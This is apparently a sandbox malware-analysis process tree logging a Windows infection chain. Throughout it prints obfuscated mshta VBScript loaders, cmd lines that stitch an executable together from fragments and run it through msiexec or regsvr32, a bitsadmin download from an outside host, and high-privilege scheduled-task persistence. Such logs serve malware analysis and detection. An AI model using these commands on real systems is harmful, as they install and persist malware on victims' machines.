C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )11⤵PID:4592
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F12⤵PID:5792
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )11⤵PID:6776
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY12⤵PID:6152
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵PID:3484
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"13⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:5192
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY13⤵
- Loads dropped DLL
PID:3272
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "6GLTtvyB0S9ougfOh2CXRyih.exe" -F10⤵
- Kills process with taskkill
PID:5592
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17bbf11fdb575d.exe5⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17bbf11fdb575d.exeMon17bbf11fdb575d.exe6⤵
- Executes dropped EXE
PID:2724
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Drops file in Drivers directory
PID:3448
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe5⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon179f74c0ff3cf1f.exeMon179f74c0ff3cf1f.exe6⤵
- Executes dropped EXE
- Checks computer location settings
PID:884 -
C:\Users\Admin\Pictures\Adobe Films\N9N76vYxukkwQD1CI_UpvR65.exe"C:\Users\Admin\Pictures\Adobe Films\N9N76vYxukkwQD1CI_UpvR65.exe"7⤵
- Executes dropped EXE
PID:4700
-
-
C:\Users\Admin\Pictures\Adobe Films\kFIU1_JeHEHjhfjNChRqTOn8.exe"C:\Users\Admin\Pictures\Adobe Films\kFIU1_JeHEHjhfjNChRqTOn8.exe"7⤵PID:5824
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7260
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:7224
-
-
C:\Users\Admin\Documents\plnTHKl8cQG5waAHP2YJZuCW.exe"C:\Users\Admin\Documents\plnTHKl8cQG5waAHP2YJZuCW.exe"8⤵
- Checks computer location settings
PID:7188 -
C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"C:\Users\Admin\Pictures\Adobe Films\Ilaefr1v7j44DGPNmdV_RRvT.exe"9⤵PID:3496
-
-
C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"C:\Users\Admin\Pictures\Adobe Films\imO0ZiS9oGLwhNVBuuZbV1xs.exe"9⤵PID:984
-
-
C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"C:\Users\Admin\Pictures\Adobe Films\jxI5xrUu3jnl7Xc0smG8sEXe.exe"9⤵PID:6996
-
-
C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"C:\Users\Admin\Pictures\Adobe Films\bAIBrcCy3xrVuiQu8gXHl3jY.exe"9⤵PID:5124
-
-
C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"C:\Users\Admin\Pictures\Adobe Films\uPYxRNAxSvxSHV00bS0YeTvO.exe"9⤵PID:6600
-
-
C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"9⤵PID:7204
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )10⤵PID:7356
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\Hb6h5uEbcZ1THC4k6kC2dsk3.exe" ) do taskkill -f -iM "%~NxM"11⤵PID:4596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:6364
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi12⤵PID:7360
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )13⤵PID:4176
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"14⤵PID:7876
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )13⤵PID:5820
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC14⤵PID:7740
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "15⤵PID:5164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"15⤵PID:7400
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC15⤵
- Loads dropped DLL
PID:7832
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Hb6h5uEbcZ1THC4k6kC2dsk3.exe"12⤵
- Kills process with taskkill
PID:7208
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"9⤵PID:7444
-
C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe"C:\Users\Admin\Pictures\Adobe Films\QEgmUrqMWWS22xi3nwDh3Hqz.exe" -u10⤵PID:7724
-
-
-
C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"C:\Users\Admin\Pictures\Adobe Films\zrT3_FY7dpLO8jDjzi1ZJ8Pj.exe"9⤵PID:6368
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=110⤵
- Loads dropped DLL
- Adds Run key to start application
PID:5536 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"11⤵PID:9024
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x54,0x60,0x19c,0x1b8,0x1d4,0x7ffbc68adec0,0x7ffbc68aded0,0x7ffbc68adee012⤵PID:8660
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x170,0x174,0x178,0x14c,0x17c,0x7ff7855c9e70,0x7ff7855c9e80,0x7ff7855c9e9013⤵PID:8736
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,6480581147440966869,9115839833656413535,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9024_1598510187" --mojo-platform-channel-handle=1660 /prefetch:812⤵PID:9064
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"9⤵PID:7544
-
C:\Users\Admin\AppData\Local\Temp\is-2F3P3.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp"C:\Users\Admin\AppData\Local\Temp\is-2F3P3.tmp\O7nom3SDxJGlpV8eVKOY1Zzv.tmp" /SL5="$302DA,506127,422400,C:\Users\Admin\Pictures\Adobe Films\O7nom3SDxJGlpV8eVKOY1Zzv.exe"10⤵
- Loads dropped DLL
PID:888 -
C:\Users\Admin\AppData\Local\Temp\is-GLV4V.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-GLV4V.tmp\DYbALA.exe" /S /UID=270911⤵PID:3448
-
C:\Users\Admin\AppData\Local\Temp\b8-d3ca8-af4-a7dbf-375e4b752d217\Kiguguzholi.exe"C:\Users\Admin\AppData\Local\Temp\b8-d3ca8-af4-a7dbf-375e4b752d217\Kiguguzholi.exe"12⤵PID:8004
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rehxitoz.f4n\GcleanerEU.exe /eufive & exit13⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\rehxitoz.f4n\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\rehxitoz.f4n\GcleanerEU.exe /eufive14⤵PID:1776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aodn1gbl.0lu\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\aodn1gbl.0lu\installer.exeC:\Users\Admin\AppData\Local\Temp\aodn1gbl.0lu\installer.exe /qn CAMPAIGN="654"14⤵PID:7360
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe & exit13⤵PID:2296
-
C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exeC:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe14⤵PID:7860
-
C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe"C:\Users\Admin\AppData\Local\Temp\xxpyq00q.22t\any.exe" -u15⤵
- Executes dropped EXE
PID:5208
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dibkstc0.3u2\gcleaner.exe /mixfive & exit13⤵PID:396
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV114⤵PID:5164
-
-
C:\Users\Admin\AppData\Local\Temp\dibkstc0.3u2\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\dibkstc0.3u2\gcleaner.exe /mixfive14⤵PID:7404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\44avl2gz.pap\autosubplayer.exe /S & exit13⤵PID:1924
-
C:\Users\Admin\AppData\Local\Temp\44avl2gz.pap\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\44avl2gz.pap\autosubplayer.exe /S14⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:6532 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:8612
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:1436
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:368
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:5356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4340
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:8356
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵
- Checks for any installed AV software in registry
PID:5644 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV116⤵PID:2056
-
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z15⤵
- Download via BitsAdmin
PID:7020
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p3nRxP8JaB9h67iL -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵PID:7352
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pT0fwB2WYFZFvlVy -y x C:\zip.7z -o"C:\Program Files\temp_files\"15⤵PID:6816
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:6672
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:7652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4008
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4628
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4628" "1600" "2256" "2204" "0" "0" "2308" "0" "0" "0" "0" "0"16⤵PID:4860
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:7928
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd15⤵PID:5068
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll" IuWtIecd16⤵
- Drops file in System32 directory
- Drops file in Program Files directory
PID:4880
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4208
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:5392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:9124
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵
- Drops file in Program Files directory
PID:7916
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\14liSd8n066ZlJOiSKs7pOPh.exe"C:\Users\Admin\Pictures\Adobe Films\14liSd8n066ZlJOiSKs7pOPh.exe"7⤵PID:5844
-
-
C:\Users\Admin\Pictures\Adobe Films\emLR1yBnJXWqQ4WeiAVEpVDR.exe"C:\Users\Admin\Pictures\Adobe Films\emLR1yBnJXWqQ4WeiAVEpVDR.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5900
-
-
C:\Users\Admin\Pictures\Adobe Films\wZ_PDkNwiqJyya1LBzC0Oydj.exe"C:\Users\Admin\Pictures\Adobe Films\wZ_PDkNwiqJyya1LBzC0Oydj.exe"7⤵PID:5656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 6768⤵
- Program crash
PID:6380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 7288⤵
- Program crash
PID:3344
-
-
-
C:\Users\Admin\Pictures\Adobe Films\BRFaifqDEarEZCox1Bk4206c.exe"C:\Users\Admin\Pictures\Adobe Films\BRFaifqDEarEZCox1Bk4206c.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5376
-
-
C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"7⤵
- Suspicious use of SetThreadContext
PID:1240 -
C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"8⤵PID:5616
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe5⤵PID:3944
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exeMon1727c156c4abcec.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exeC:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exe7⤵
- Executes dropped EXE
PID:1908
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exeC:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exe7⤵
- Executes dropped EXE
PID:2420
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe5⤵PID:344
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17332e41e6b.exeMon17332e41e6b.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2288 -
C:\Users\Admin\AppData\Roaming\5431899.exe"C:\Users\Admin\AppData\Roaming\5431899.exe"7⤵
- Executes dropped EXE
PID:2868
-
-
C:\Users\Admin\AppData\Roaming\520258.exe"C:\Users\Admin\AppData\Roaming\520258.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4380
-
-
C:\Users\Admin\AppData\Roaming\7540508.exe"C:\Users\Admin\AppData\Roaming\7540508.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4636
-
-
C:\Users\Admin\AppData\Roaming\5667762.exe"C:\Users\Admin\AppData\Roaming\5667762.exe"7⤵
- Executes dropped EXE
PID:4880 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\5667762.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\5667762.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )8⤵
- Executes dropped EXE
PID:1908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\5667762.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\5667762.exe") do taskkill /im "%~nxT" /f9⤵PID:4136
-
C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExELYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj10⤵PID:4436
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )11⤵PID:7048
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f12⤵PID:6172
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )11⤵PID:1512
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S12⤵PID:7164
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵PID:6980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"13⤵
- Executes dropped EXE
PID:4112
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 .\BgG1KXA.y -U -S13⤵
- Loads dropped DLL
PID:7620
-
-
-
-
-
